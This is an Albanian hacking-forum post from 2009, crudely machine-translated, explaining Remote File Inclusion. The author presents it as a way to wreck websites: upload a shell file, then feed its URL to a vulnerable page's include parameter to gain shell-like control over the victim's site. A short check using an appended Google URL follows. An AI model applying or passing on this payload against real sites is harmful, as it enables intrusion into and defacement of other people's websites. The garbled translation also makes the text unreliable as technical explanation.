Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Rfi

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Rfi   Wed Dec 16, 2009 6:29 am

RFI është një mënyrë e mirë për të fshij një website. Ajo është përdorur me shell. Supozoni keni ngarkuar tuaj në shell:

webi.com / shell.txt
dhe keni gjetur një të prekshme për të RFI site ... pastaj mund të bëni ju si vijon:

webi.com / index.php? faqe = yousite.com / shell.txt

Kjo do të japë përsëri në qasjen e juaj viktimė s faqet e FTP, thjesht si predhë, që

kështu të mund f * ck up çdo gjë që dëshironi.

PS: - Nëse doni të kontrolloni nëse YOUR website është e ndjeshme ndaj RFI bashkëngjitni apo jo pastaj të bëjë të mëposhtme.

Nëse site's URL është:

webi.com / index.php? id = 545


vetëm të shtoni diçka e tillë në fund

webi.com / index.php? id = http://www.google.com

Dhe në qoftë se ajo incldes e google faqe ne faqen tuaj, që do të thotë të prekshme të saj të RFI.
__________________
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Rfi
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: HaCkinG-
Kërce tek: